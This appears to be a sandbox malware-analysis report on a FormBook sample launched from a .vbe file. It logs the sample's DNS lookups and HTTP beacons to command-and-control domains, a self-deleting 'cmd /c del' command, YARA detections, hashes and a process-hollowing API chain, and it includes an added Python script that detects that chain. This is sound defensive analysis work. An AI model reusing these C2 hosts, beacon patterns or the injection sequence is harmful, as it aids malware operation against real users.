Jul 26, 2024 13:03:47.725677013 CEST | 1.1.1.1 | 192.168.2.5 | 0x6d4d | No error (0) | www.tateshades.xyz | | 198.54.117.242 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:04:08.229626894 CEST | 1.1.1.1 | 192.168.2.5 | 0xaf9a | No error (0) | www.gyosei-arimura.com | | 103.169.142.0 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:04:29.475148916 CEST | 1.1.1.1 | 192.168.2.5 | 0x16bd | No error (0) | www.ashleymorgan.live | ashleymorgan.live | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:04:29.475148916 CEST | 1.1.1.1 | 192.168.2.5 | 0x16bd | No error (0) | ashleymorgan.live | | 79.133.41.250 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:04:29.475163937 CEST | 1.1.1.1 | 192.168.2.5 | 0x16bd | No error (0) | www.ashleymorgan.live | ashleymorgan.live | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:04:29.475163937 CEST | 1.1.1.1 | 192.168.2.5 | 0x16bd | No error (0) | ashleymorgan.live | | 79.133.41.250 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:05:09.212642908 CEST | 1.1.1.1 | 192.168.2.5 | 0xfb71 | Name error (3) | www.gv031.net | none | none | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:05:29.489697933 CEST | 1.1.1.1 | 192.168.2.5 | 0x6b26 | No error (0) | www.rendamaisbr.com | | 104.21.29.136 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:05:29.489697933 CEST | 1.1.1.1 | 192.168.2.5 | 0x6b26 | No error (0) | www.rendamaisbr.com | | 172.67.149.56 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:05:49.773336887 CEST | 1.1.1.1 | 192.168.2.5 | 0x5f92 | No error (0) | www.especialistaleitura.online | especialistaleitura.online | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:05:49.773336887 CEST | 1.1.1.1 | 192.168.2.5 | 0x5f92 | No error (0) | especialistaleitura.online | | 195.35.41.249 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:06:10.163721085 CEST | 1.1.1.1 | 192.168.2.5 | 0x87de | No error (0) | www.rtproketslotcsn.art | rtproketslotcsn.art | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:06:10.163721085 CEST | 1.1.1.1 | 192.168.2.5 | 0x87de | No error (0) | rtproketslotcsn.art | | 67.223.118.63 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:06:30.595186949 CEST | 1.1.1.1 | 192.168.2.5 | 0x8497 | No error (0) | www.exploringtheoutdoors.net | host.websitepro.hosting | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:06:30.595186949 CEST | 1.1.1.1 | 192.168.2.5 | 0x8497 | No error (0) | host.websitepro.hosting | | 34.149.86.124 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:06:51.010611057 CEST | 1.1.1.1 | 192.168.2.5 | 0xc4c3 | No error (0) | www.invigoratewell.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:06:51.010611057 CEST | 1.1.1.1 | 192.168.2.5 | 0xc4c3 | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:06:51.010611057 CEST | 1.1.1.1 | 192.168.2.5 | 0xc4c3 | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:06:51.010611057 CEST | 1.1.1.1 | 192.168.2.5 | 0xc4c3 | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:06:51.010611057 CEST | 1.1.1.1 | 192.168.2.5 | 0xc4c3 | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:07:12.005621910 CEST | 1.1.1.1 | 192.168.2.5 | 0x611e | Server failure (2) | www.legalix.xyz | none | none | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:07:32.465130091 CEST | 1.1.1.1 | 192.168.2.5 | 0xbb21 | No error (0) | www.21stcut.shop | | 103.224.182.210 | A (IP address) | IN (0x0001) | false
                                          • www.tateshades.xyz
                                          • www.gyosei-arimura.com
                                          • www.ashleymorgan.live
                                          • www.rendamaisbr.com
                                          • www.especialistaleitura.online
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49716 | 198.54.117.242 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 13:03:47.733885050 CEST | 160 | OUT | GET /de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn HTTP/1.1
                                          Host: www.tateshades.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49718 | 103.169.142.0 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 13:04:08.235335112 CEST | 164 | OUT | GET /de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx HTTP/1.1
                                          Host: www.gyosei-arimura.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
Jul 26, 2024 13:04:08.740252972 CEST | 765 | IN | HTTP/1.1 301 Moved Permanently
                                          Date: Fri, 26 Jul 2024 11:04:08 GMT
                                          Content-Type: text/html
                                          Content-Length: 167
                                          Connection: close
                                          Cache-Control: max-age=3600
                                          Expires: Fri, 26 Jul 2024 12:04:08 GMT
                                          Location: https://www.gyosei-arimura.com/de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx
                                          expect-ct: max-age=86400, enforce
                                          x-content-type-options: nosniff
                                          x-frame-options: SAMEORIGIN
                                          x-xss-protection: 1; mode=block
                                          referrer-policy: strict-origin-when-cross-origin
                                          Server: cloudflare
                                          CF-RAY: 8a93e83e3c204362-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49719 | 79.133.41.250 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 13:04:29.481951952 CEST | 163 | OUT | GET /de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh4 HTTP/1.1
                                          Host: www.ashleymorgan.live
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49720 | 104.21.29.136 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 13:05:29.496283054 CEST | 161 | OUT | GET /de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnx HTTP/1.1
                                          Host: www.rendamaisbr.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
Jul 26, 2024 13:05:29.983182907 CEST | 734 | IN | HTTP/1.1 404 Not Found
                                          Date: Fri, 26 Jul 2024 11:05:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAbLK1QdlRV6LTBnBQHP4GMtosATTCpVjiz%2F%2B8enYj6c8u0AHIppOl0xFo2qiVuQVaotmCVNuMU9HCRRoMoShzJFVrl5VcK8YiriQ5ZaRymFb5cMcNjDMhOkipfaQtZ83MDb%2F%2FPM"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a93ea39e95042c0-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49721 | 195.35.41.249 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 13:05:49.778940916 CEST | 172 | OUT | GET /de94/?iH=L48pdJnx&jBZ=2R5LA04AgrrHOF4dber2AYa+4EXsdsXp9ugXIfcwTjx7QxDViEac/VVT3dt/yVkMwVF8 HTTP/1.1
                                          Host: www.especialistaleitura.online
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:



                                          Target ID:0
                                          Start time:07:03:01
                                          Start date:26/07/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe"
                                          Imagebase:0x7ff6c78b0000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:07:03:09
                                          Start date:26/07/2024
                                          Path:C:\Users\user\AppData\Local\Temp\HHhHh.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\HHhHh.exe"
                                          Imagebase:0x320000
                                          File size:574'464 bytes
                                          MD5 hash:62FA567CBB7227AEB7755B679D780725
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          Reputation:low
                                          Has exited:true

                                          Target ID:4
                                          Start time:07:03:10
                                          Start date:26/07/2024
                                          Path:C:\Users\user\AppData\Local\Temp\HHhHh.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\HHhHh.exe"
                                          Imagebase:0x7c0000
                                          File size:574'464 bytes
                                          MD5 hash:62FA567CBB7227AEB7755B679D780725
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          Target ID:5
                                          Start time:07:03:10
                                          Start date:26/07/2024
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff674740000
                                          File size:5'141'208 bytes
                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:6
                                          Start time:07:03:13
                                          Start date:26/07/2024
                                          Path:C:\Windows\SysWOW64\wscript.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\wscript.exe"
                                          Imagebase:0x9b0000
                                          File size:147'456 bytes
                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:7
                                          Start time:07:03:17
                                          Start date:26/07/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:07:03:17
                                          Start date:26/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:8.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:210
                                            Total number of Limit Nodes:13
                                            execution_graph (rendered graph, not reproduced as text): nodes span the 04B3xxxx region (DuplicateHandle, GetModuleHandleW, LoadLibraryExW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateActCtxA) and the 051Cxxxx region (PostMessageW, FindCloseChangeNotification, CreateProcessA, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory, Wow64SetThreadContext, ResumeThread). In the 051Cxxxx region, 51cb502 reaches 51cbc41/51cbc50 and then 51cbc81/51cbc90/51cbcf6, which fan out to the helpers that call CreateProcessA (51cadb0/51cada5), VirtualAllocEx (51caa60/51caa68), ReadProcessMemory (51cac11/51cac18), WriteProcessMemory (51cab20/51cab28), Wow64SetThreadContext (51ca988/51ca990) and ResumeThread (51ca8db/51ca8e0): the process-hollowing chain reported in the signatures.
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a92974ae32c694e4232ebf6aeb318b64232f543760c69a3ca503d495a108493a
                                            • Instruction ID: 6fd8b8ebfde4d216c6d1c75f83caf45eb07253c157bcd487a3985dbe7e604e0d
                                            • Opcode Fuzzy Hash: a92974ae32c694e4232ebf6aeb318b64232f543760c69a3ca503d495a108493a
                                            • Instruction Fuzzy Hash: 27D1CE317012008FEB26DB76C450B6EBBFBAF89704F2445ADD146DB290DB36E902CB51
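The execution graph above is the API chain CreateProcessA, VirtualAllocEx, ReadProcessMemory/WriteProcessMemory, Wow64SetThreadContext, ResumeThread that the signature section reports as process hollowing. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it walks a per-process API-call trace and flags any child that receives that chain in order. The trace format (caller pid, API name, child key) and the sample lines are constructed for the example, and the alias table is an assumption about which API variants to treat as the same stage.

```python
"""Flag a process-hollowing API chain in a per-process API-call trace.

Added example for this report; the trace format and the sample lines are
constructed, not taken from Joe Sandbox output, and mirror the APIs the
execution graph shows (CreateProcessA, VirtualAllocEx, ReadProcessMemory,
WriteProcessMemory, Wow64SetThreadContext, ResumeThread).
"""

# Stages of the classic hollowing chain, in the order they must appear for
# one (caller pid, child) pair. ReadProcessMemory is deliberately not a stage:
# it is common in benign code and the graph shows it only as a side read.
STAGES = ("CreateProcess", "VirtualAllocEx", "WriteProcessMemory",
          "SetThreadContext", "ResumeThread")

# Assumed equivalences: A/W and Wow64 variants and the Nt* calls the Win32
# wrappers end up in. Extend for whatever trace source you actually use.
ALIASES = {
    "CreateProcessA": "CreateProcess",
    "CreateProcessW": "CreateProcess",
    "CreateProcessInternalW": "CreateProcess",
    "NtWriteVirtualMemory": "WriteProcessMemory",
    "Wow64SetThreadContext": "SetThreadContext",
    "NtSetContextThread": "SetThreadContext",
    "NtResumeThread": "ResumeThread",
}

# Constructed trace: "<caller pid> <api> <child key>". The child key is a
# correlation label for the process being acted on ("-" marks calls that touch
# no other process). pid 2 performs the full chain; pid 7 only creates and
# resumes a child without writing into it.
TRACE = """\
2 CreateProcessA child-A
2 VirtualAllocEx child-A
2 ReadProcessMemory child-A
2 WriteProcessMemory child-A
2 WriteProcessMemory child-A
2 Wow64SetThreadContext child-A
2 ResumeThread child-A
6 GetModuleHandleW -
6 LoadLibraryExW -
7 CreateProcessA child-B
7 ResumeThread child-B
"""


def normalise(api):
    """Map an API name onto the stage name used in STAGES (or leave it)."""
    return ALIASES.get(api, api)


def parse_trace(text):
    """Parse trace lines into (pid, stage_name, child_key) tuples."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        pid, api, child = line.split()
        events.append((int(pid), normalise(api), child))
    return events


def chain_progress(events):
    """Return {(pid, child): stages completed}, walking STAGES in order.

    A CreateProcess restarts the chain for that child; a repeated earlier
    stage (the second WriteProcessMemory above) keeps the current state;
    anything out of order is ignored so unrelated calls cannot reset it.
    """
    progress = {}
    for pid, api, child in events:
        if api not in STAGES or child == "-":
            continue
        key = (pid, child)
        done = progress.get(key, 0)
        if api == STAGES[0]:
            progress[key] = 1
        elif done and done < len(STAGES) and api == STAGES[done]:
            progress[key] = done + 1
    return progress


def hollowed_children(events):
    """(pid, child) pairs that completed every stage, sorted for stable output."""
    return sorted(k for k, n in chain_progress(events).items()
                  if n == len(STAGES))


if __name__ == "__main__":
    events = parse_trace(TRACE)
    for (pid, child), n in sorted(chain_progress(events).items()):
        verdict = "HOLLOWING" if n == len(STAGES) else "partial"
        print(f"pid {pid} -> {child}: {n}/{len(STAGES)} stages ({verdict})")
```

Partial matches are kept on purpose: a child that only reaches WriteProcessMemory is still worth a look, and the stage count gives a cheap way to tune the alert threshold against a real trace.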

                                            Control-flow Graph

                                            control_flow_graph (rendered graph, not reproduced as text): function 4b3d051-4b3d22d; calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess and GetCurrentThreadId, plus the subroutine at 4b3d638.
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 04B3D0DE
                                            • GetCurrentThread.KERNEL32 ref: 04B3D11B
                                            • GetCurrentProcess.KERNEL32 ref: 04B3D158
                                            • GetCurrentThreadId.KERNEL32 ref: 04B3D1B1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 8cabe457c4e0562f154e14190c9b9f019e4c2022e5e645f3b4054b1a6d1c5f44
                                            • Instruction ID: 8ff0e631685eb365618de5772776aea23f776d525f54ddbf9f124c5ef1e7b492
                                            • Opcode Fuzzy Hash: 8cabe457c4e0562f154e14190c9b9f019e4c2022e5e645f3b4054b1a6d1c5f44
                                            • Instruction Fuzzy Hash: 3F5147B19007498FEB15DFAAD588BAEBBF5EF48304F208499D409A7360D738A944CF65

                                            Control-flow Graph

                                            control_flow_graph (rendered graph, not reproduced as text): function 4b3d060-4b3d22d (alternate entry into the same body as 4b3d051); calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess and GetCurrentThreadId, plus the subroutine at 4b3d638.
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 04B3D0DE
                                            • GetCurrentThread.KERNEL32 ref: 04B3D11B
                                            • GetCurrentProcess.KERNEL32 ref: 04B3D158
                                            • GetCurrentThreadId.KERNEL32 ref: 04B3D1B1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 304c668c1d73a62a365959ba40959a1021f2210b50f58f11da91c0f49bed2666
                                            • Instruction ID: 9c821917790890c0b156d55b7c111c264e222b0bc6c2385a789d1517462fdcaf
                                            • Opcode Fuzzy Hash: 304c668c1d73a62a365959ba40959a1021f2210b50f58f11da91c0f49bed2666
                                            • Instruction Fuzzy Hash: 7E5157B19007098FEB15DFAAD588BAEBBF5EF48304F208499D419A7360D738AD44CF65

                                            Control-flow Graph

                                            control_flow_graph (rendered graph, not reproduced as text): function 51cadb0-51cb0f5; CreateProcessA is called in block 51caf3f-51caff9, followed by a chain of small conditional blocks and a self-looping tail at 51cb0f5.
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 051CAFE6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: df9277fa144034d5bd50666a90f2006e71473061b1672f656f7a43edf01fad95
                                            • Instruction ID: f4f3d03331e05110e407d813584bfecbfc00c09234d6280b1fe3b2735977ee0b
                                            • Opcode Fuzzy Hash: df9277fa144034d5bd50666a90f2006e71473061b1672f656f7a43edf01fad95
                                            • Instruction Fuzzy Hash: 8F917C71D04219CFDF21CFA8C845BEDBBB2BF49304F1485A9E819A7280DB759985CF92

                                            Control-flow Graph

                                            control_flow_graph (rendered graph, not reproduced as text): function 51cada5-51cb0f5 (alternate entry into the same body as 51cadb0); CreateProcessA is called in block 51caf3f-51caff9, followed by a self-looping tail at 51cb0f5.
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 051CAFE6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: ad533435474381e88c3887fd6e5f484bd599fdedfef27e4db7bd824aadca0454
                                            • Instruction ID: 9c948dbdec45f26ad22579d38c82d1e076a12a37a496c0c95dfce4966085b026
                                            • Opcode Fuzzy Hash: ad533435474381e88c3887fd6e5f484bd599fdedfef27e4db7bd824aadca0454
                                            • Instruction Fuzzy Hash: BF918B71D04219CFDF21CFA8C845BEDBBB2BF49304F1485A9E819A7280DB759985CF92

                                            Control-flow Graph

                                            control_flow_graph (rendered graph, not reproduced as text): function 4b3adc8-4b3b048; calls the subroutines 4b3a0ec, 4b3b051/4b3b060, 4b3a0f8, 4b3a108, 4b3a118 and 4b3a128, and GetModuleHandleW in block 4b3b000-4b3b02b.
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 04B3B01E
                                            Memory Dump Source
